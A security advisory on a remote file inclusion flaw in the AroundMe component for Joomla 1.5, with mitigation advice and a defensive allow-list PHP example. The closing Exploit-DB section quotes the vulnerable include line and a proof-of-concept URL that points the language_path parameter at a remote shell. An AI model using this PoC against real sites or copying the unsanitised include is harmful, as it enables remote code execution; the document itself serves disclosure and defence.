Vendor: AroundMe Component
By: cr4wl3r
CVSS: 7.5 (HIGH)
Vulnerability: Remote File Inclusion (RFI)
CWE: 98
Product Name: AroundMe Component
Affected Version From: 1.5.2000
Affected Version To: 1.5.2000
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:joomla:1.5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

A remote file inclusion vulnerability exists in the AroundMe component for Joomla! 1.5.0. The connect.php script builds the path it passes to include_once from the language_path parameter, so the request controls which file is included. This can be exploited to execute arbitrary PHP code by including a malicious file from a remote location.

Mitigation:

Input validation should be used to ensure that user-supplied data is not used to include files from external sources.
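
One way to apply this mitigation to the include on line 25 of connect.php, as an added example that is not part of the original advisory or the AroundMe code base. The helper name resolve_language_file, the ALLOWED_LANGS list and the <base>/<code>/connect.lang.php layout are assumptions; the temporary directory and candidate values are constructed for the demo.

```php
<?php
declare(strict_types=1);

// Assumption: languages live in <base>/<code>/connect.lang.php; the list is illustrative.
const ALLOWED_LANGS = ['en', 'de', 'fr'];

/**
 * Hypothetical helper: map a language code to a file under a fixed
 * server-side directory. The request never supplies a path or URL.
 */
function resolve_language_file(string $baseDir, string $lang): string
{
    // Exact-match allow-list: URLs, "../" sequences and stream wrappers all fail here.
    if (!in_array($lang, ALLOWED_LANGS, true)) {
        throw new InvalidArgumentException('unsupported language code');
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $lang . '/connect.lang.php');
    // Defence in depth: the resolved file must sit inside the base directory
    // (catches symlinks that point elsewhere).
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file missing or outside base directory');
    }
    return $file;
}

// Constructed demo input: a throwaway language directory and three candidate values.
$base = sys_get_temp_dir() . '/aroundme_lang_' . bin2hex(random_bytes(4));
mkdir($base . '/en', 0700, true);
file_put_contents($base . '/en/connect.lang.php', "<?php \$connect_lang = 'en';\n");

foreach (['en', 'http://example.invalid/', '../en/'] as $candidate) {
    try {
        include_once resolve_language_file($base, $candidate);
        echo "included: {$candidate}\n";
    } catch (Throwable $e) {
        echo "rejected: {$candidate} ({$e->getMessage()})\n";
    }
}

// Remove the demo files.
unlink($base . '/en/connect.lang.php');
rmdir($base . '/en');
rmdir($base);
```

Keeping allow_url_include = Off in php.ini (its default) blocks URL includes at the interpreter level as a second layer.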

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ Indonesian Hacker ]

########################################################################
3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

       <?php
           include_once($language_path . 'connect.lang.php');
       ?>
########################################################################

########################################################################
PoC  :   http://server/[path]/components/core/connect.php?language_path=[Shell]
########################################################################

########################################################################
#Contact Me : cr4wl3r[4t]linuxmail[dot]org
########################################################################


   [ Gorontalo / 2009 ]